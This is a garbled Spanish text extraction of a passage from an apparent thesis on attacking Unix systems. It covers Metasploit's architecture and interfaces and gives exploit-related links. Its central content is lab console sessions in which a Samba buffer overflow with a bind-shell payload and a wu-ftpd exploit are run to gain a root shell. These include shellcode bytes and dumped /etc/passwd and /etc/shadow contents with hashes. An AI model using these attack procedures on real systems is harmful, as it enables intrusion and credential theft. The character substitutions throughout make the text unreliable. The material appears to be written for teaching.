los e9"loits. El "roble a con los @?!s triviales es que son /ácil ente identi/icables en un "a'load "or un 75,. Con este generador# es sencillo crear @?!s que /uncionen igual# "ero de longitud variable ' "seudoaleatorios. dE 4a!load% !roveen c8digo al Fra eIor6 que "uede ser ejecutado luego de que un e9"loit tenga é9ito al controlar el /lujo de ejecuci8n. M,F dis"one de unas cuantas o"ciones# ' "ara crear uno nuevo $ace /alta crear una clase que $erede de Ms/%%!a'load. 5e esta esté dis"onible "revia ente. eE Auxiliar! 1odules% ,e trata de utilidades incluidas en el M,F que no tienen que ver directa ente con e9"lotar un objetivo# sino con actividades relacionadas% ejecutar un !ort ,can# "rovocar un 5o,*Jconocido en un so/tIare# loguearse en una Base de 5atos# interactuar con algGn ,ervicio# detectar la versi8n de un servidor# etc. #. 2rame@or: 4lu)ins% !ara di/erenciarlo de los los "lugins co o "iezas diseBadas "ara cualquier cosa con él. M,F dis"one de servicio en un soc6et# etc. 5e esta contenido de una tabla. 8dulos# "uede "ensarse a is o. El odi/icar el Fra eIor6 anera "ueden agregarse acciones "ersonalizadas# o so"ortar otra arquitectura que no

objetivo "uede ser cualquiera# 'a que en "ri era instancia se "er ite $acer 8dulos "ara cone9i8n a Bases de 5atos ;!ostgre,V:# M',V: ' ,V:ite># otro que ejecuta M,F co o un anera# el "lugin "ara cone9i8n a bases de datos "er ite# "or eje "lo# atacar un conjunto de $osts de acuerdo al

+.*.-. 7nter/aces de 2suario
En cuanto a las inter/aces $acia el usuario /inal# $a' cuatro "rinci"ales% *. L6nea de /omandos Dms=cliE% 7deal "ara ejecutar etas"loit co o "arte

de un scri"t e9terno# 'a que ace"ta los "ará etros de entrada# ejecuta lo que se le ordena "or la l)nea de co andos ' sale. Ler Consola @ro. -2. 2. /onsola Interactiva Dms=consoleE% Es la /or a ás rá"ida de usar Metas"loit. Básica ente se ejecuta el /ra eIor6# ' se obtiene una l)nea de co andos donde se selecciona el&los e9"loits a ejecutar# el "a'load# las
*J- Ler Plosario% 5o,% 5enegaci8n de ,ervicio# "ág. *02. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *2* de 2*.

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

o"ciones ' se lanza el ataque. En la Consola @ro. --.se "uede observar la salida del co ando Cin/oD sobre un e9"loit# "ara ver el alcance ' caracter)sticas del is o antes de utilizarlo o no.

marcelo@saturno:~/src/6rame>or=& .1$ ./ms6cli K age: .;m f!"i TeDp"oitAname> Toption1@a"ue> -mo7e0 1111111111111111111111111111111111111111111111111111 3o7e ---9?:e"p 9.:ummarE 9O:ption 9#:7@an!e7 98:D. <@a ion 9P:aE"oa7 9T:arget 9#,:tion 9,:'e!6 9<:De!ute <Dp"oit 11111111 Name ---eDp"oit;b 7i; oft!art;mer!ante!A oft!art O@erf"o> eDp"oit;freeb 7;ta!a! ;Dta!a! 7Areport Cuffer O@erf"o> eDp"oit;'puD;"p7;!"eanupAeDe! ?...@ #uDi"iarE 111111111 Name ---auDi"iarE;a7min;ba!6upeDe!;7ump $emote Bi"e #!!e auDi"iarE;a7min;ba!6upeDe!;regi trE $egi trE #!!e auDi"iarE;a7min;!i !o;io A'ttpAaut'AbEpa #7mini trati@e #!!e ?...@ De !ription ----------=erita Ca!6up <De! &in7o> =erita Ca!6up <De! .er@er De !ription ----------3er!ante! .oft,art ,H8 GT#,#,.D T1 +.1.( report9: ?P-KG 2PD ,omman7 <De!ution De !ription ----------/ouJre "oo6ing at it babE` .'o> information about t'i mo7u"e .'o> a@ai"ab"e option for t'i mo7u"e .'o> a@ai"ab"e a7@an!e7 option for t'i mo7u"e .'o> a@ai"ab"e i7 e@a ion option for t'i mo7u"e .'o> a@ai"ab"e paE"oa7 for t'i mo7u"e .'o> a@ai"ab"e target for t'i eDp"oit mo7u"e .'o> a@ai"ab"e a!tion for t'i auDi"iarE mo7u"e $un t'e !'e!6 routine of t'e e"e!te7 mo7u"e <De!ute t'e e"e!te7 mo7u"e

,i !o 8O. ?TTP Knaut'oriOe7

Consola -2% Ejecuci8n de Metas"loit sin "ará etros en su versi8n de :)nea de Co andos

-. Inter=a3 Mrá=ica de Usuario Dms=)uiE% !ara quienes dis"onen de o "re/ieren la inter/az grá/ica# ejecutar varios trabajos a la vez# etc.# Metas"loit dis"one de una versi8n grá/ica ulti"lata/or a ;7lustraci8n **>. Es bastante atractiva# rá"ida e intuitiva co o "ara considerarla "or sobre la versi8n de consolaH ade ás "osee la ca"acidad de ejecutar varias CconsolasD de M,F al is o tie "o ' desde la P27 is a. 1. Aplicaci-n He( Dms=@e(E% ,u ándose a la C odaD actual de las
Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *22 de 2*.

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

CA"licaciones 4ebD# Metas"loit introduce una

u' c8 oda ' versátil

anera de correr Metas"loit en /or a re ota o local# s8lo a"untando un navegador a su ,ervidor 4eb ' A"licaci8n e bebidos ;7lustraci8n **>.
marcelo@saturno:~/src/6rame>or=& .1$ ./ms6console A A A F F 9A:A AAAA AAAAF FA AAAA AAA AAAA F F AAA AF FA F [ ; A : A:; A F;AAA: A [F F; A [F F A: F F F 9 9; ;F FA9 9 F FAAA F F F F F FAF F F FAA FAFAFAF[AAAA:[AAA:AFFA9AAA;F FFA;FAF[AAA;FAF[AAA: FAF 1P -- --1P -- --11ms6 ' m f @3.1-re"ea e (69 eDp"oit - 11) paE"oa7 17 en!o7er - 6 nop +6 auD

in6o e,ploit/linu,/ids/snortbopre .nort Ca!6 Orifi!e Pre-Prepro!e 5365 No C.D 2i!en e or $emote <Dp"oit

Name: =er ion: P"atform: Pri@i"ege7: 2i!en e:

Pro@i7e7 bE: 5ai_ern 2au TD>ing ImE e!.org> #@ai"ab"e target : 87 Name -- ---0 Debian 3.1 .arge Ca i! option : Name ,urrent .etting -----------------$?O.T $PO$T 90)0 PaE"oa7 information: .pa!e: 1073 #@oi7: 1 !'ara!ter De !ription: T'i mo7u"e eDp"oit a ta!6 o@erf"o> in t'e Ca!6 Orifi!e pre-pro!e or mo7u"e in!"u7e7 >it' .nort @er ion (.+.04 (.+.14 (.+.(4 an7 (.+.3. T'i @u"nerabi"itE !ou"7 be u e7 to !omp"ete"E !ompromi e a .nort en or4 an7 >ou"7 tEpi!a""E gain an atta!6er fu"" root or a7mini trati@e pri@i"ege . $eferen!e : 'ttp:;;>>>. e!uritEfo!u .!om;bi7;15131 'ttp:;;!@e.mitre.org;!gi-bin;!@ename.!gi*name1(005-3(5( 'ttp:;;Dfor!e.i .net;Dfor!e;a"ert ;i7;(07 ms6 ' sIo> e,ploits $equire7 -------Ee Ee De !ription ----------T'e target a77re T'e target port

Consola --% Metas"loit corriendo en /or a interactiva desde consola

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *2- de 2*.

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

7lustraci8n **% 7nter/az Prá/ica ' 4eb de Metas"loit# res"ectiva ente Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *21 de 2*.

Ca")tulo +. ( +.2.Eje "los de Ataques con E9"loits

+.2. Eje "los de Ataques con E9"loits
En este caso se "resentarán dos ataques con e9"loits re otos de eje "lo# $ec$os en un a biente de "ruebas es"ecial ente creado "ara este trabajo. :a idea es ostrar c8 o /uncionan# utilizando versiones viejas ' discontinuadas de so/tIare. !ara ver el c8digo /uente de a bos e9"loits# ver Ane9o 5# "ág. *O0.

+.*.*. Atacando ,a ba con Metas"loit
:a siguiente ;Consola -1> es una sesi8n de ataque a un ,ervidor P@2&:inu9 <ed=at versi8n 0# ejecutando ,a ba*J1# /uncionando co o servidor de arc$ivos e i "resoras de una red :A@ t)"ica.
marcelo@saturno:~/src/6rame>or=&2.0$ sudo ./ms6console K ing Term::$ea72ine::.tub4 8 ugge t in ta""ing omet'ing better 9ie Term::$ea72ine::Hnu: A A A A F F F F 9A: F A AA AAA AAAF FA AA A AAA A AA F F AAA AF FA F JA c A [ ; A [ AA; Ac ; AAF JA [F F; A [F F AAF F F F F F F AA; FF 9AF [AA [ FA: F F 9A: F F FA FAF FAF FAF[AAAF[AA[AA4AFAAA; .AA;FAF[AAA;FAF[AAF F F FAF P -- --1- m f!on o"e @(.7 -157 eDp"oit ms6 ' use sambaNnttrans ms6 sambaNnttrans ' sIo> options <Dp"oit Option 111111111111111 <Dp"oit: -------require7 optiona" require7 Name ------$?O.T T?$<#D. $PO$T Defau"t ------(5 139 De !ription --------------------------------T'e target a77re T'e number of !on!urrent attempt T'e amba port - 76 paE"oa7 0

Target: Target Not .pe!ifie7 ms6 sambaNnttrans ' set /K4-2 192.168.0.200 $?O.T -> 19(.16).0.(00 ms6 sambaNnttrans ' sIo> targets .upporte7 <Dp"oit Target 1111111111111111111111111

*J1 ,a ba es un so/tIare "ara 2ni9 que i "le enta el "rotocolo ,MB&C7F,# que es el que utiliza 4indoIs "ara co "artir arc$ivos e i "resoras en una <ed. Ade ás# "er ite integrar estaciones de trabajo 2ni9 a redes 4indoIs. 2<:% $tt"%&&III.sa ba.org Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *25 de 2*.

Ca")tulo +. ( +.2.Eje "los de Ataques con E9"loits

0 1 ( 3 + 5 6 7

.amba .amba .amba .amba .amba .amba .amba .amba

,omp"ete Crute Bor!e (.0 Crute Bor!e (.( Crute Bor!e (.0.6 ; $e7 ?at 6.( (.0.7 ; $e7 ?at 7.0 (.(.1 ; $e7 ?at 7.( (.(.5 ; $e7 ?at ).0 (.(.+ ; ."a!6>are ).1

ms6 sambaNnttrans ' set 2%/BC2 2 T#$H<T -> ( ms6 sambaNnttrans ' sIo> *%874%)3eta p"oit Brame>or6 K ab"e PaE"oa7 111111111111111111111111111111111111 "inuDAia3(Aa77u er "inuDAia3(Abin7 "inuDAia3(Abin7A tg "inuDAia3(AeDe! "inuDAia3(Afin7re!@ "inuDAia3(Afin7re!@A tg "inuDAia3(Afin7 o!6 "inuDAia3(Are@er e "inuDAia3(Are@er eAimpuritE Kp"oa7;<De!ute "inuDAia3(Are@er eA tg "inuDAia3(Are@er eAu7p 2inuD 2inuD 2inuD 2inuD 2inuD 2inuD 2inuD 2inuD 2inuD 8#3( 8#3( 8#3( 8#3( 8#3( 8#3( 8#3( 8#3( 8#3( #77 K er Cin7 .'e"" .tage7 Cin7 .'e"" <De!ute ,omman7 $e!@ Tag Bin7 o!6 .'e"" .tage7 Bin7 o!6 .'e"" .r!Port Bin7 o!6 .'e"" $e@er e .'e"" $e@er e 8mpuritE

2inuD 8#3( .tage7 $e@er e .'e"" 2inuD 8#3( $e@er e KDP .'e""

ms6 sambaNnttrans ' set *%874%) linu,Nia 2Nbind P#/2O#D -> "inuDAia3(Abin7 m f ambaAnttran 9"inuDAia3(Abin7: > eDp"oit -Q0 .tarting Cin7 ?an7"er. -Q0 .tarting atta!6 again t target .amba (.( Crute Bor!e -Q0 #tta!6 >i"" u e (5 t'rea7 >it' )19 tota" attempt -Q0 -Q0 -Q0 -Q0 -Q0 < tab"i 'ing (5 !onne!tion9 : to t'e target... --- .etting up t'e .3C e ion... --- < tab"i 'ing tree !onne!tion... --- .en7ing fir t nttran !omponent... --- ,omp"ete7 range 0D0)300000:0D0)(f63!0

-Q0 Crute for!e 'ou"7 !omp"ete in approDimate"E 16.0 minute -Q0 < tab"i 'ing (5 !onne!tion9 : to t'e target... -Q0 --- .etting up t'e .3C e ion... -Q0 --- < tab"i 'ing tree !onne!tion... -Q0 --- .en7ing fir t nttran !omponent... -Q0 --- ,omp"ete7 range 0D0)(f63!0:0D0)(e!7)0 ?...@ -Q0 Crute for!e 'ou"7 !omp"ete in approDimate"E 7.( minute -Q0 < tab"i 'ing (5 !onne!tion9 : to t'e target... -Q0 --- .etting up t'e .3C e ion... -Q0 --- < tab"i 'ing tree !onne!tion... -Q0 --- .en7ing fir t nttran !omponent... -Q0 --- ,omp"ete7 range 0D0)(+67+0:0D0)(3!b00 ?U@ Bot connection 6rom 192.168.0.2:1121 M&' 192.168.0.200:.... id ui7109root: gi7109root: group 1999nobo7E: uname &a 2inuD "o!a"'o t."o!a"7omain (.+.(0-6 N1 T'u Beb (7 10:01:19 <.T (003

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *2J de 2*.

Ca")tulo +. ( +.2.Eje "los de Ataques con E9"loits
i6)6 at'"on i3)6 HNK;2inuD cat /etc/issue $e7 ?at 2inuD re"ea e 9 9.'ri6e: 5erne" [r on an [m cat /etc/pass>d root:D:0:0:root:;root:;bin;ba ' bin:D:1:1:bin:;bin:; bin;no"ogin 7aemon:D:(:(:7aemon:; bin:; bin;no"ogin a7m:D:3:+:a7m:;@ar;a7m:; bin;no"ogin "p:D:+:7:"p:;@ar; poo";"p7:; bin;no"ogin En!:D:5:0: En!:; bin:;bin; En! 'ut7o>n:D:6:0: 'ut7o>n:; bin:; bin; 'ut7o>n 'a"t:D:7:0:'a"t:; bin:; bin;'a"t mai":D:):1(:mai":;@ar; poo";mai":; bin;no"ogin ne> :D:9:13:ne> :;et!;ne> : uu!p:D:10:1+:uu!p:;@ar; poo";uu!p:; bin;no"ogin operator:D:11:0:operator:;root:; bin;no"ogin game :D:1(:100:game :;u r;game :; bin;no"ogin gop'er:D:13:30:gop'er:;@ar;gop'er:; bin;no"ogin ftp:D:1+:50:BTP K er:;@ar;ftp:; bin;no"ogin nobo7E:D:99:99:Nobo7E:;:; bin;no"ogin ?...@ mar!e"o:D:500:500:3ar!e"o Bernan7eO:;'ome;mar!e"o:;bin;ba ' cat /etc/sIado> root:M1M?=U;.?iNM(@gBg3bu+O#U1p_<b<2!#0:1+003:0:99999:7::: bin:Q:1+003:0:99999:7::: 7aemon:Q:1+003:0:99999:7::: a7m:Q:1+003:0:99999:7::: "p:Q:1+003:0:99999:7::: En!:Q:1+003:0:99999:7::: 'ut7o>n:Q:1+003:0:99999:7::: 'a"t:Q:1+003:0:99999:7::: mai":Q:1+003:0:99999:7::: ne> :Q:1+003:0:99999:7::: uu!p:Q:1+003:0:99999:7::: operator:Q:1+003:0:99999:7::: game :Q:1+003:0:99999:7::: gop'er:Q:1+003:0:99999:7::: ftp:Q:1+003:0:99999:7::: nobo7E:M1Mu!6;!3NeMeC3D?.p<#(P6&159pq56O;:1+003:0:99999:7::: ?...@ mar!e"o:M1M tg6;OimMH&7gC9KG,B5_t71<p+t.g.:1+003:0:99999:7::: -Q0 <Diting Cin7 ?an7"er. ms6 sambaNnttrans!linu,Nia 2Nbind" ' e,it marcelo@saturno:~/src/6rame>or=&2.0$

!ara el ataque se utiliz8 Metas"loit versi8n 2.+# la Glti a de la serie 2.9# 'a que si bien Metas"loit -.* conten)a este e9"loit en su base de datos# el ataque no /ue e9itoso en las "ruebas. Cabe aclarar que Meta"s"loit -.* tiene algunos igrar los que /alten o a "liar e9"loits que no están del todo co "letos ;co o éste> con res"ecto a la versi8n anterior# ' el equi"o de desarrollo aGn trabaja en los que están en cuanto a caracter)sticas. ,e "uede ver que el e9"loit en M,F v2.+ se lla a Csa baUnttransD# ' corres"onde a un ataque de Bu//er ?ver/loI detallado en el CLE(2..-(..O5 *J5 '
*J5 2<: del <e"orte% $tt"%&&cve. itre.org&cgi(bin&cvena e.cgiYna ea2..-(..O5 Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *2+ de 2*.

Ca")tulo +. ( +.2.Eje "los de Ataques con E9"loits

Bugtraq 75 +*.J*JJ# "ublicado el *5 de Marzo de 2..-. :a utilizaci8n de M,F v2.+ es idéntica a la de la serie -.9% ,e selecciona el e9"loit ;Cuse sa baUnttransD> ,e ven las o"ciones requeridas "or el is o ;Cs$oI o"tionsD> ,e establecen las o"ciones a utilizar ;Cset <=?,FD# Cset FA<PEFD> ,e establece el "a'load ;Cset !AK:?A5 linu9Uia-2UbindD>% Este "a'load genera un ini(servidor con un s$ell en el "uerto 1111 del objetivo# con odo los "er isos del usuario que ejecuta el "roceso e9"lotado ;,a ba se ejecuta nor al ente co o usuario root>. Es si ilar a un netcat en :7,FE@# co o se describi8 en la Consola 2*# "ág. 0..

● ● ● ●

:uego de la es"era ;algunos

inutos># el atacante "uede conectarse al is o.

objetivo ;*02.*JO...2..%1111># con lo que se accede al s$ell del

,e ejecutan algunos co andos# "ara ver qué "er isos se tienen# a qué ,? corres"onde# ' se uestran los arc$ivos de usuarios ' de "assIords.

+.*.2. E9"lotando un ,ervidor FF!
A continuaci8n ;Consola -1> se incor"orado# el 42(FF!5*J+.
marcelo@saturno:~/src/mil>0rm/plat6orms/linu,/remote$ ./e,ploit&6tp.bin &<< &t 10 &d 192.168.0.100 7350>urm - D)6;"inuD >uftp7 T1 (.6.1 remote root 9@er ion 0.(.(: team te o 9t'D bnut 4 toma 4 EnnergE.net `:. N trEing to "og into 19(.16).0.100 >it' 9ftp;moOi""aI: ... !onne!te7. N banner: ((0 r'6( BTP er@er 9=er ion >u-(.6.091: 3on Beb () 10:30:36 <.T (000: rea7E. u ing 56 bEte 'e""!o7e: ;Q 'e""!o7e4 56 bEte Q; 90 90 90 90 90 90 90 90 90 90 90 90 31 7b +3 b) F ............1.,. 0b 7+ 51 0b (7 01 01 01 01 50 )9 e1 6a 0+ 5) )9 F .tR.-....P..Y.G. !( !7 )0 eb 0e 31 7b f7 e3 fe !a 59 6a 03 5) !7 F .....1...../Y.G. )0 eb 05 e) e7 ff ff ff F ........ NNN T#$H<T: $e7?at 6.( 9Uoot: ->u-ftp7-(.6.0-3.i3)6.rpm0 N 1. fi""ing memorE gap P&D pat' 91:: (57 V;V i !urrent 7ire!torE.

uestra otra sesi8n de ataqueH esta vez se

trata de un viejo servidor <ed =at :inu9 versi8n J.2# ' su servidor FF!

*JJ Ler 2<:% $tt"%&&III.securit'/ocus.co &bid&+*.J *J+ ,itio o/icial del so/tIare% $tt"%&&III.Iu(/t"d.org& Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *2O de 2*.

Ca")tulo +. ( +.2.Eje "los de Ataques con E9"loits
N (. ;Q 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 f0 eb eb eb eb eb eb eb eb eb eb eb 90 )9 !a en7ing bigbuf P fa6e!'un6 bui"7ing !'un6: 9-0D0)06e1a00 1 Dpbuf4 +9+ bEte Q; 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 ff ff ff f! ff ff ff 9+ e1 06 0) 7) 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! eb 0! 90 90 90 90 90 90 90 90 31 7b +3 b) 0b 7+ 51 0b (7 01 01 e1 6a 0+ 5) )9 !( !7 )0 eb 0e 31 7b 59 6a 03 5) !7 )0 eb 05 e) e7 ff ff

0D0)07f77): in (3) bEte 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 f7 0! 0! 0! 0! 0! 0! 0! 0! 0! 0! 90 01 f7 ff 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 07 eb eb eb eb eb eb eb eb eb eb 90 01 e3 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0) 0! 0! 0! 0! 0! 0! 0! 0! 0! 0! 90 50 fe F F F F F F F F F F F F F F F F F F F F F F F F F F F F F F F 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 ............D... ................ ................ ................ ................ ................ ................ ................ ................ ................ ................ ................ ..1.,..tR.-....P ..Y.G......1.... ./Y.G.........

pa7!'un6A iOe 1 0D0000001) 11> 15 N 3. triggering free9g"ob"i t-10: N N eDp"oitation u!!ee7e7. en7ing rea" 'e""!o7e N en7ing etreui7;!'root;eDe!@e 'e""!o7e N pa>ning 'e"" NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNN ui7109root: gi7109root: egi71509ftp: group 1509ftp: 2inuD r'6( (.(.1+-5.0 N1 Tue 3ar 7 (1:07:39 <.T (000 i*)6 un6no>n

p>d ;'ome;ftp ls cd / p>d ; ls bin boot 7e@ et! 'ome "ib

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *20 de 2*.

Ca")tulo +. ( +.2.Eje "los de Ataques con E9"loits
"o tPfoun7 mnt opt pro! root bin tmp u r @ar uname &a 2inuD r'6( (.(.1+-5.0 N1 Tue 3ar 7 (1:07:39 <.T (000 i*)6 un6no>n id ui7109root: gi7109root: egi71509ftp: group 1509ftp:

Consola -1% Ataque a un servidor FF! con un e9"loit "Gblico

:a vulnerabilidad a"rovec$ada se encuentra detallada en el CE<F Advisor' ;CA(2..*(--*JO ' CLE(2..*(.55.*J0># ' se "uede clasi/icar co o un error en el anejo de los strings enviados "or el usuario.

+.-. Enlaces 2tiles
7nternet tiene uc$)si a in/or aci8n sobre e9"loits# desde su anera de ás crearlos $asta los c8digos /uente is os# "ero un listado de los sitios

i "ortantes al res"ecto incluir)a a los siguientes% 1ilH$rm% ,itio que tiene en su "ágina "rinci"al un listado de los Glti os e9"loits "ublicados# ade ás de una base de e9"loits se encuentra en constante actualizaci8n. !ágina !rinci"al% $tt"%&& ilI.r .co & Colecci8n de e9"loits% $tt"%&& ilI.r .co &s"loits& ilI.r .tar.bz2

u' i "ortante# que

&ac:Trac:% Es una distribuci8n de :inu9 es"ecial ente creada "ara !enetration Festing. $tt"%&&III.re ote(e9"loit.org&bac6trac6.$t l Damn Bulnera(le Linux% Esta es una distribuci8n de :inu9 en /or ato de :ive(C5# que es total ente insegura a "ro"8sito# ' que ade ás inclu'e uc$os e9"loits# cursos ' $erra ientas "ara e9"lotarse a s) $tt"%&&III.da nvulnerablelinu9.org& is o.

4ac:et Atorm Aecurit!% ,itio con in/or aci8n ' $erra ientas de de/ensa "or un lado ' e9"loits "or el otro. $tt"%&&"ac6etstor securit'.org&

*JO 2<: del aviso% $tt"%&&III.cert.org&advisories&CA(2..*(--.$t l *J0 2<:% $tt"%&&cve. itre.org&cgi(bin&cvena e.cgiYna eaCA@(2..*(.55. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *-. de 2*.

Ca")tulo +. ( +.-.Enlaces 2tiles

Learn

Aecurit!

0nline%

7nclu'e

cursos#

in/or aci8n

'

varios

CCrac6MeD*+. "ara co enzar a a"render sobre $ac6ing. $tt"%&&III.learnsecurit'online.co &inde9."$"

T9e Ft9ical 8ac:er Net@or:% Co unidad# noticias ' recursos sobre =ac6ing Etico. $tt"%&&III.et$ical$ac6er.net& /rac:mes.de% ,itio que contiene una Base de Crac6Mes entre otros. $tt"%&&III.crac6 es.de& ás que

interesante# clasi/icados "or nivel# "lata/or a ' lenguaje de "rogra aci8n#

*+. 2n CCrac6MeD es un C"roble a de crac6ingD# general ente en /or a de arc$ivo binario# "ara ro "er ' e9"lotar su C"rotecci8nD. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *-* de 2*.

Ane9o A. ( Ane9o A. !ila de !rotocolos FC!&7!

Anexo A. 4ila de 4rotocolos T/4GI4
En este ane9o se "retende describir in/or aci8n del conjunto de "rotocolos ás utilizados que giran alrededor de FC!&7!# co o "or eje "lo 7!# FC!# 25!# etc.# a /in de tenerlos a ano al leer el docu ento ' que sirva de co "le ento.

A.*. !rotocolo 7!v1 ( Encabezado
(it 466set 0 2 6. 96 128 160 (its 0V =er ion .V0 8V11 16V18 19V 1 2ong. <n!abeOa7o Tipo 7e .er@i!io 2ongitu7 Tota" en CEte B"ag 8D 7e Proto!o"o Off et 7e" Bragmento ,'e!6 um 7e" <n!abeOa7o

87entifi!a7or 7e .e!uen!ia Time to 2i@e Dire!!i%n 8P Origen - .our!e #77re Dire!!i%n 8P De tino - De tination #77re Op!ione 9op!iona":

160/192T Dato

Fi"o de ,ervicio ;segGn <FC +0*>%
(its 0&2 Pre!e7en!ia (its &6 (it 0 $e er@a7o Tipo 7e .er@i!io De"aE F T'roug'put F $e"iabi"itE

Fi"o de ,ervicio ;actualizado en el 2..*# segGn <FC -*JO>%
(its 0&1 ,ampo D. - Diff.er@ (its 6&0 ,ampo <,N \ Notifi!a!i%n 7e ,onge ti%n <Dp"Z!ita

Flags%
(it 0 $e er@a7o (it 1 No Bragmentar - DB (it 2 3] Bragmento - 3B

5escri"ci8n breve de los ca "os S47R7U7!v1T%
● ●

Bersi-n ;1 Bits>% "ara 7!v1 ;este caso> es igual a .9.*... Lon)itud del Fnca(e3ado ;7=: N 6nternet Header >engt > ;1 bits>% Cantidad de "alabras de -2 bits que ocu"a el encabezado# li itando el encabezado total ;ca "os obligatorios _ o"cionales> a J. b'tes. Lon)itud Total en &!tes ;*J bits>% Contiene la longitud total del datagra a# inclu'endo encabezado ' "a'load. Identi=icador de Aecuencia ;*J bits># 2la)s ;- bits>% Contiene un nG ero Gnico de identi/icacion# necesario cuando el datagra a es "arte de un

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *-2 de 2*.

Ane9o A. ( A.*.!rotocolo 7!v1 ( Encabezado

datagra a

ás grande "ero /rag entado anterior ente# circunstancia en que á9i o de saltos "or los cuales este

se utilizan los bits de /rag entaci8n del ca "o Flags.

Time To Live ;FF:> ;O bits>% :) ite "aquete "uede ser enrutado.

ID de 4rotocolo ;O Bits>% 75 del "rotocolo enca"sulado en el "a'load# de acuerdo al listado descri"to en el <FC +0.. !or eje "lo# 7CM!a.9.*# FC!a.9.J ' 25!a.9**. /9ec:sum ;*J bits>% <esultado del algorit o de correcci8n de errores a"licado al encabezado. Direcci-n I4 0ri)en ;-2 bits>% 1 b'tes# cada uno es"eci/icando de . a 255 la direcci8n 7! origen. !or eje "lo% *02.*JO...J. a .9C. .9AO .9.. .9-C. Direcci-n I4 Destino ;-2 bits>% 1 b'tes# cada uno es"eci/icando de . a 255 la direcci8n 7! destino.

A.2. !rotocolo FC! N Encabezado%
(it o66set 0 2 6. 96 128 160 (its 0V .V0 8V11 16V 1 Puerto De tino Puerto Origen \ .our!e Port Nro. 7e .e!uen!ia - .equen!e number N^mero 7e #,5 - #!6no>"e7gment number Off et 7e Dato ,'e!6 um Op!ione 9op!iona": $e er@a7o ,&$ <,< K$H #,5 P.? $.T ./N B8N &in7o> .iOe Puntero Krgente

160/192T Dato

5escri"ci8n breve de los ca "os S47R7UFC!T%

4uerto 0ri)en ;*J Bits>% 2 B'tes indicando el "uerto de origen del seg ento FC!. !or eje "lo# 5O.+*a.9E2 .95+. 4uerto Destino ;*J Bits>% 2 B'tes indicando el "uerto destino del seg ento FC!. !or eje "lo# 22a.9.. .9*J. @G ero de ,ecuencia ;-2 Bits>% 5ebe su e9istencia al esque a de interca bio de datos /iable de FC!. Fiene un doble rol%

,i el bit de ,K@ está activado ;es igual a .9*># entonces este nG ero es el 7,@ ;6nitial Secuence Gumber N @G ero de ,ecuencia 7nicial> ' el "ri er b'te de datos es el nG ero de secuencia ás uno. ,i no# entonces el "ri er b'te de datos es el nG ero de secuencia.

○ ●

@G ero de ACR ;-2 Bits>% ,i el bit de ACR está activado ;.9*># entonces el

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *-- de 2*.

Ane9o A. ( A.2.!rotocolo FC! N Encabezado%

valor de este ca "o es el siguiente b'te que el rece"tor está es"erando.

?//set de 5atos ;1 Bits>% Fa aBo del encabezado en "alabras de -2 bits. El )ni o es de 5 "alabras ;*J. bits a 2. b'tes># ' el "alabras a .9.**.. á9i o es de *5 ;1O. bits a J. b'tes>. !or eje "lo# si el encabezado es de 21 b'tes a *02 bits a J Flags ;O Bits>%

C4< ' ECE% ,irven "ara el <FC -*JO.

anejo de la congesti8n descri"to en el

○ ○ ○ ○ ○

2<P% 7ndica que el ca "o de "untero a datos urgentes es signi/icativo. ACR% 7ndica que el ca "o de @G ero de ACR es signi/icativo. !,=% Funci8n de Pus . <,F ;:eset>% <einicia la cone9i8n. ,K@% ,incroniza nG eros de secuencia# indica el inicio de la cone9i8n. F7@% Finalizaci8n de env)o de datos. ecanis o FC! de Cventanas deslizantesD.

○ ●

